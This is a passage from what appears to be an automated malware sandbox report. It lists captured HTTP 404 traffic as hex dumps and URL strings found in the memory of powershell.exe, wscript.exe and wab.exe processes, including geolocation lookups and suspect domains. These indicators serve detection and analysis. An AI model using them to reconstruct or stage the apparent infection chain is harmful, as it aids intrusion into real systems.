67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:27 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:03:29 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://vendasnaweb1.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 15931Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 23 37 92 2d fa bb b4 56 bf 03 8a 5e b6 48 9b 20 93 1f fa 4a 8a ea b6 cb 76 b7 cf b5 db 5e 2e f7 cc 3d d7 f6 aa 03 26 82 99 28 21 81 6c 00 49 8a c5 d6 c3 9c 75 df e2 fe 9d 17 bb 81 4c 7e 89 4c 52 94 4a d3 7d 66 54 a5 14 10 88 d8 b1 63 c7 be 7e fd f5 8f 6f 7e f9 9f 3f 7d 43 12 97 ca 9b 93 6b ff 87 48 a6 e2 61 2d 73 f4 ab 9f 6b 3e 06 8c df 9c bc ba 4e c1 31 12 25 cc 58 70 c3 da df 7e f9 96 5e d6 48 7b f5 a2 58 0a c3 da 44 c0 34 d3 c6 d5 48 a4 95 03 85 99 53 c1 5d 32 e4 30 11 11 d0 e2 d2 24 42 09 27 98 a4 36 62 12 86 9d 02 67 03 e6 d4 e8 91 76 f6 74 05 72 9a b2 3b 2a 52 16 03 cd 0c f8 26 a1 64 26 86 d3 a2 d0 09 27 e1 e6 a7 ff f8 df b1 50 88 f0 1f ff af 26 a0 7c a9 61 9c 91 cf 3e b9 ec 76 3a 03 f2 03 e4 c4 0a 07 d7 ed 32 ff e4 5a 0a 75 4b 0c c8 e1 29 57 d6 03 8f c1 45 c9 29 49 f0 34 3c 6d b7 27 a0 38 b3 8a 4d 61 d4 69 45 3a 2d bb ad aa 6a 4c 3a 30 8a 39 a8 11 37 cb 70 7a 96 65 52 44 cc 09 ad da c6 da 2f ee 52 89 4f be db b0 f6 2d 00 27 19 33 6c 45 84 7c 66 d8 df 73 3d a8 95 0d 6b 89 73 99 0d 77 db b6 c7 58 da ae 7d 74 73 0e a8 67 8a 72 fe c7 ff 36 42 db 67 92 c1 5f 8f 61 37 59 d9 c8 88 cc dd 9c 4c 85 e2 7a da 7a 37 cd 20 d5 ef c5 5b 70 4e a8 d8 92 21 99 d7 46 cc c2 df 8c ac 85 0b e8 df da bf b5 6d 6b da d2 26 fe ad 5d ac d6 fe 86 e0 06 7e 6b 17 c5 bf b5 3b 67 ad a0 d5 fb ad 7d d1 bd bb e8 fe d6 ae 35 6b 70 e7 b0 be 95 a9 18 2f 76 12 3f 0f 0f 0b 0b 34 fc fb 4d 09 88 27 7f d7 b9 89 a0 16 ce 6b e8 1d 14 b2 28 5b e0 17 f0 db 5a fc d6 9e 66 54 a8 48 e6 dc 37 7b 6f 8b 40 51 46 71 47 80 13 b7 52 a1 5a ef ed 1f 27 60 86 e7 ad f3 56 a7 76 7f 3f 38 69 7f fe 9a fc 92 08 4b c6 42 02 c1 bf 2c 77 9a c6 a0 c0 60 5b 4e 3e 6f 9f bc 1e e7 2a f2 bb ac 8b a6 6a cc 27 cc 10 dd b4 4d 18 2c e3 24 aa 43 63 ee cc ac 78 73 c3 b9 cd b3 4c 1b f7 0b 58 67 43 68 3a 91 e2 89 a5 59 58 57 30 25 5f 23 70 a3 35 61 32 87 1f c7 f5 c6 fd c0 82 b5 08 f3 d6 69 83 5a b5 2c b8 ef 70 e2 ba 6e fe 8f b7 3f fe b5 65 9d c1 cd 89 f1 ac ee 1a 8d 7b 14 23 4a 7c bb fb fb 55 fb ac 8e 3d 3c 35 68 45 38 aa f9 19 22 57 0f 9a 41 13 ef 4c 4d 18 ee 42 70 97 ac af 09 88 38 71 0d 0c e0 d4 f2 17 dc 65 dd 61 7a d0 18 94 03 78 96 7f 13 ca f5 ba 5f 1a c3 66 75 68 c5 c8 c9 2f 12 b9 b3 63 a0 5b 1c 13 1b 4d 33 ac 7f 04 27 55 70 6a be 14 9b c6 c0 80 cb 8d 22 ae 05 68 82 59 7d b5 57 94 af 31 5f 3c c2 70 38 34 bf ba df ef 1b 6b 81 f3 a5 c0 76 2a bc fc 98 1d a1 a3 6a 63 Data Ascii: v#7-V^H Jv^.=&(!lIuL~LRJ}fTc~o~?}CkHa-sk>N1%Xp~^H{XD
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_5063416e1289b199f2413e8737e4ca%7C%7C1725019450%7C%7C1725015850%7C%7Cceb62e721885b64e1797ee288a644a39; expires=Fri, 30-Aug-2024 12:04:10 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7Jb45O%2F58zDZA7wBpQvRHF%2FnNwZ%2BtBualZ1TqGrDukHaoO%2FFAOZU5vBUn%2FNvODMGvQRKOP7N10CqreOWygb2jVDdpqVneUfd2J3z3LR%2B5T78GrEGva1tFzZq9wOBaJbhzY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba4298e590842f1-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 6e b6 64 39 9b 49 a7 a7 7b 27 99 f4 b4 d3 5f 7f bd 89 57 07 22 21 89 36 45 32 04 69 d9 ed d6 03 ed 6b ec 93 ed 29 00 24 41 8a ba f8 92 99 d9 b3 5f cf c4 92 80 42 a1 50 00 0a 85 42 a1 70 fa ec fb 8f 6f 3f fd fe f3 3b 34 4f 16 fe d9 e1 e9 33 4d fb ec 4d d1 4f ef d0 09 ba 38 43 a7 90 8c 7c 1c cc 46 0a 09 b4 5f cf 15 e4 f8 98 d2 91 e2 91 13 e4 87 d8 f5 82 99 46 bd 84 a0 20 d4 2e a9 72 86 4e 9f 7d 26 81 eb 4d 2f 34 ad 84 ef 78 17 be e3 7b e0 6b ce 12 c2 88 6c fd f9 ac f9 d3 bb d6 c5 19 e4 9c 6d Data Ascii: 36c9}v8o}XRnd9I{'_W"!6E2ik)$A_BPBpo?;4O3MMO8C|F_F .rN}&M/4x{klm
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_ffb160b8a35cf1a8ebfd13dcf4b1ef%7C%7C1725019453%7C%7C1725015853%7C%7C1698686f1ff4342c0ee039076d21f46f; expires=Fri, 30-Aug-2024 12:04:13 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fAHIDblWZMBoVnCky%2BdXB78e9qmR%2FCMHlo5MNucYLNiG1BtPr%2Fkl0ckJc0UWdKoshdPzns%2B8HqBwAL4wwTGhJXM05S%2BmopFWTc%2B3qlvShCLzvK8O0KBauO%2BVlb73sWPliT0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba4299e0a1f429d-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d ed 76 db 38 b2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 6f 7d d8 96 2c 67 33 e9 f4 74 ef 24 93 9e 76 fa f6 ed 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b7 1f 68 5f 63 9f 6c 4f 01 20 09 52 a4 24 7f 64 66 f6 ec ed 99 58 12 50 28 14 0a 40 a1 50 28 14 4e 9e 7d ff f1 ed a7 df 7f 7e 87 16 c9 d2 3f dd 3f 79 a6 69 9f bd 19 fa e9 1d 3a 46 e7 a7 e8 04 92 91 8f 83 f9 58 21 81 f6 eb 99 82 1c 1f 53 3a 56 3c 72 8c fc 10 bb 5e 30 d7 a8 97 10 14 84 da 05 55 4e d1 c9 b3 cf 24 70 bd d9 b9 a6 95 f0 1d 6d c3 77 74 0f 7c ed 79 42 18 91 9d 3f 9f b5 7f 7a d7 39 3f 85 Data Ascii: 36c6}v8o}XRo},g3t$vM:I)!Hnh_clO R$dfXP(@P(N}~??yi:FX!S:V<r^0UN$pmwt|yB?z9?
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:04:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0set-cookie: wp_woocommerce_session_cfa12a8f8cbb64cd768d0f772536504c=t_b21e6b470e46914bacef13fb9474ae%7C%7C1725019455%7C%7C1725015855%7C%7Cb952974e6c119af1c02ddd0a324ce78b; expires=Fri, 30-Aug-2024 12:04:15 GMT; Max-Age=172800; path=/; HttpOnlylink: <https://katasoo.com/wp-json/>; rel="https://api.w.org/"vary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7YaOfMKytBCR1sb9a1fQDo870HlpHNeUvOL8WqcjvG1QL41DxFQ4h3GrhguKz7SpjCNuwo%2Flw4CSNSP%2BeRdzAmMzTNaaNhZ5KkwXBlt%2FU3lna1QF5DGZ9VeqQHJpSNLwSI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ba429addc408cdd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 33 36 63 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d eb 76 db 38 d2 e0 6f fb 9c 7d 07 84 e9 58 52 c2 bb 2e b6 25 cb d9 4c 3a 3d dd 3b c9 a4 a7 9d fe fa eb 4d bc 3a 10 09 49 b4 29 92 21 48 cb 6e b5 1e 68 5f 63 9f 6c 4f 01 20 09 52 d4 c5 97 cc cc 9e fd 7a 26 96 04 14 0a 85 02 50 28 14 0a 85 b3 67 df 7f 7c fb e9 f7 9f df a1 59 32 f7 cf 0f cf 9e 69 da 67 6f 82 7e 7a 87 4e d1 e5 39 3a 83 64 e4 e3 60 3a 54 48 a0 fd 7a a1 20 c7 c7 94 0e 15 8f 9c 22 3f c4 ae 17 4c 35 ea 25 04 05 a1 76 45 95 73 74 f6 ec 33 09 5c 6f 72 a9 69 25 7c 27 bb f0 9d dc 03 5f 73 9a 10 46 64 eb cf 67 cd 9f de b5 2e cf 21 e7 7c 33 fa 0d a8 35 ad Data Ascii: 36c8}v8o}XR.%L:=;M:I)!Hnh_clO Rz&P(g|Y2igo~zN9:d`:THz "?L5%vEst3\ori%|'_sFdg.!|35
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:07 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:09 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 28 Aug 2024 12:05:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5E5A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://avocaldoperu.com
              Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 0000000F.00000002.2253941242.000000000078D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000003.2252846292.0000000000780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enH
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpg
              Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/json.gp
              Source: powershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: wab.exeString found in binary or memory: http://www.ebuddy.com
              Source: wab.exeString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
